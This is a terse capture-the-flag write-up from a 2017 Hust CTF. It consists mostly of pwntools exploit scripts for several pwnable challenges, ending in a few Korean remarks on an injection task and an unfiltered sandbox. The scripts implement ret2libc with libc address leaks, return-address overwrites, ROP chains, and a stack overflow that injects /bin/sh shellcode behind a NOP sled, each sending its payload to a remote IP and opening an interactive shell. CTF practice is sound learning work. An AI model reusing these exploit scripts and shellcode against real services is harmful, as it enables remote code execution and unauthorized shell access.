2017 Hust CTF write up

from pwn import *
import sys
elf = ELF("./attackme")
#libc = ELF("libc-2.23.so")
pop3ret = 0x80485f9
pop2ret = 0x80485fa
 
if sys.argv[1] == "1":
    s = remote("223.194.105.182", 37100)
elif sys.argv[1] == "0":
    s = process("./attackme")
 
def leak():
    s.recvuntil("Press any thing\n")
    
    pay  = "A"*104
    pay += p32(elf.plt['write'])
    pay += p32(pop3ret)
    pay += p32(1)
    pay += p32(elf.got['write'])
    pay += p32(4)
 
    pay += p32(0x0804852B)
    pay += p32(0)
 
    s.sendline(pay)
 
    s.recv(113)
    write_add = u32(s.recv(4))
    s.recvuntil("Press any thing\n")
    sh_add = write_add + 0x85E3B
    system_add = write_add - 0x9AC50
    log.info("write_add  : "+hex(write_add))
    log.info("sh_add   : "+hex(sh_add))
    log.info("system_add : "+hex(system_add))
 
    pay1  = "A"*104
    pay1 += p32(system_add)
    pay1 += p32(0)
    pay1 += p32(sh_add)
 
    s.sendline(pay1)
    s.interactive()
 
if __name__ == '__main__':
    leak()
 
 

pwnable - RR2L(50p)

from pwn import *
import sys
 
if sys.argv[1] == "1":
    s = remote("223.194.105.182", 22901)
elif sys.argv[1] == "0":
    s = process("./wind")
 
def start():
    log.info("Wind Start func!")
    #s.recv(1024)
    s.recvuntil("[+] INPUT: ")
 
    pay  = "A"*32
    pay += p32(0x080487F9)
 
    s.sendline(pay)
 
if __name__ == '__main__':
    start()
    s.interactive()
 

pwnable - Wind(100p)

from pwn import *
#s = process('./challenge')
s = remote('223.194.105.182', 29001)
elf = ELF("./challenge")
payload  = 'A'*200
#payload += p32(0x08048980)
s.sendline(payload)
 
s.recv(1024)
pay1  = "A"*204
pay1 += p32(0)
pay1 += p32(0x00020f31)
pay1 += "B"*192
pay1 += p32(0x08048986)
s.sendline(pay1)
s.interactive()
 
 

pwnable - heap(100p)

from pwn import *
import time
s = remote('223.194.105.182', 41001)
s.recv(1024)
 
payload = 'A'*24 + p32(0x080483e3) + p32(0x0804a00c)
s.sendline(payload)
 
leaked = u32(s.recv(4)) - 0x18540
system_libc = leaked + 0x3ada0
binsh = leaked + 0x15b82b
 
payload_1 = 'A'*24 + p32(0x08048296)*4 + p32(system_libc) + 'AAAA' + p32(binsh)
s.sendline(payload_1)
 
s.interactive()

pwnable - ohmybof(100p)

from pwn import *
 
#s = process("./earth")
s = remote("223.194.105.182", 22900)
 
shellcode = "\xda\xd4\xba\x11\xf2\x16\x5f\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x0d\x31\x56\x18\x03\x56\x18\x83\xee\xed\x10\xe3\x35\x06\x8d\x95\x98\x7e\x45\x8b\x7f\xf7\x72\xbb\x50\x74\x15\x3c\xc7\x55\x87\x55\x79\x20\xa4\xf4\x6d\x3c\x2b\xf9\x6d\x6f\x49\x90\x03\x40\xee\x03\xa8\xbe\x96\xaf\x31\xd9\x56\x67\xe1\xac\xb6\x4a\x85\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
 
payload = "A" * 0x6c
payload += "BBBB"
payload += p32(0xbfffec3c + 200)
payload += "\x90" * 2000
payload += shellcode
 
s.sendline(payload)
s.interactive()
 
 

pwnable - earth(100p)

pwnable - shellwedance(300p)

// 그냥 인젝션 문제

misc 한문제를 또 봤는데 그건 그냥 import OS 되서 패스,,,,샌드박스 문제인데 필터링이 없다.

200점 짜리 ROP인가..무튼 너무 파일이 더러웠따,,,,공부하다가 stripped 라는 것도 알게되서 한번 관련 문제 리버싱인거 같지만 봐야될듯.